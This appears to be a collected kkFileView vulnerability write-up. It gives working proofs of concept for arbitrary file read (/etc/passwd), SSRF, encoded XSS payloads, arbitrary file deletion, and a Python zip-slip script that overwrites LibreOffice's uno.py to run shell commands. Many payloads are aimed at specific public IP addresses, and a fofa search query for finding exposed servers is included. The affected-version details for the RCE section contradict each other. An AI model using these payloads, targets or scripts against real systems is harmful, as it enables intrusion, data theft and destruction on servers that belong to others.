Title: kkFileView Vulnerability Summary

0x00 There is arbitrary file reading vulnerability in kkFileview

Vulnerability Description Keking KkFileview is a Spring-Boot online preview project for creating file documents in China. Keking kkFileview has a security vulnerability that originates from the existence of reading arbitrary files through a directory traversal vulnerability, which may cause sensitive files to leak on the relevant host.

Vulnerability affects kkFileview=3.6.0

fofa query body='kkFile:View'

Proof of vulnerability

http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd

0x01 kkFileView SSR vulnerability

Vulnerability Description There is an SSRF vulnerability in kkFileview v4.1.0. Attackers can exploit this vulnerability to cause server-side request forgery (SSRF). Remote attackers can force the application to issue any request by injecting any URL into the URL parameters.

Vulnerability affects kkFileview=v4.1.0

Proof of vulnerability

http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn

0x03 kkFileView XSS vulnerability

Vulnerability Description kkFileview v4.1.0 has two XSS vulnerabilities, which may lead to the leak of website cookies.

Vulnerability affects kkFileview=v4.1.0

Vulnerability Proof http://www.baidu.com/test.txt'img src=111 oneerror=alert(1)

Encoding base64:

aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg==

url encoding:

aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

poc1:

/onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E

/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E

http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

svg/onload=alert(1) encoding base64:

PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+

url encoding:

PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

poc2:

/picturesPreview?urls=currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

http://119.91.146.127:8012/picturesPreview?urls=currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

0x04 kkFileView upload any file, resulting in xss and file inclusion vulnerabilities

Vulnerability Description There is a file resolution vulnerability in the entire version of kkFileview. Attackers can use this vulnerability to create storage XSS, file inclusion or SSRF. Remote attackers can persistently use the application to issue attack requests by uploading any JavaSript script to the server.

Vulnerability affects kkFileView=4.1.0

Vulnerability Proof 1. Upload file

2. Access vulnerability location

http://139.9.101.60:8012/demo/2.html

2. The file contains:

https://file.keking.cn/demo/test1.js

access:

https://file.keking.cn/demo/test14.html

0x05 kkFileView arbitrary file deletion vulnerability

Vulnerability Description

kkFileview v4.0.0 has arbitrary file deletion vulnerability, which may cause any file in the system to be deleted

Vulnerability Impact

kkFileview=v4.0.0

Vulnerability Proof

/deleteFile?fileName=demo%2F.\xss.pdf

Get request to this uri will delete xss.pdf in the \kkFileView-master\server\src\main\file directory (originally, the files under the \kkFileView-master\server\src\main\file\demo directory)

0x06 kFileView-v4.3.0~v4.40-beta RCE vulnerability

Vulnerability impact: v4.2.1 and v4.2.0 are both impacts, 4.1.0 is not affected

Upload any file

import zipfile

if __name__=='__main__':

try:

binary1=b'1ueeeeeee'

binary2=b'hacked_by_1ue'

zipFile=zipfile.ZipFile('hack.zip', 'a', zipfile.ZIP_DEFLATED)

info=zipfile.ZipInfo('hack.zip')

zipFile.writestr('test', binary1)

zipFile.writestr('././././././././././././././././././././././././tmp/flag', binary2)

zipFile.close()

except IOError as e:

raise e

Make malicious hack.zip, note that there must be a normal file, such as test, to facilitate the creation of hack.zip_cache file

Upload files and preview

Discover successful travel

RCE

You can upload any file, and you can append the file contents

After my research, I found that the target will call the system's Libreoffice when using odt to pdf, and this process will call the uno.py file in the library, so the content of the py file can be overwritten.

import zipfile

if __name__=='__main__':

try:

binary1=b'1ue'

binary2=b'import os\r\nos.system(\'touch /tmp/hack_by_1ue\')'

zipFile=zipfile.ZipFile('hack.zip', 'a', zipfile.ZIP_DEFLATED)

info=zipfile.ZipInfo('hack.zip')

zipFile.writestr('test', binary1)

zipFile.writestr('././././././././././././././././././././././././opt/libreoffice7.5/program/uno.py', binary2)

zipFile.close()

except IOError as e:

raise e

Malicious zip packages Upload and preview

Then upload an odt file and initiate a libreoffice task to upload and preview

You can see that the command was executed successfully

The content is indeed written in uno.py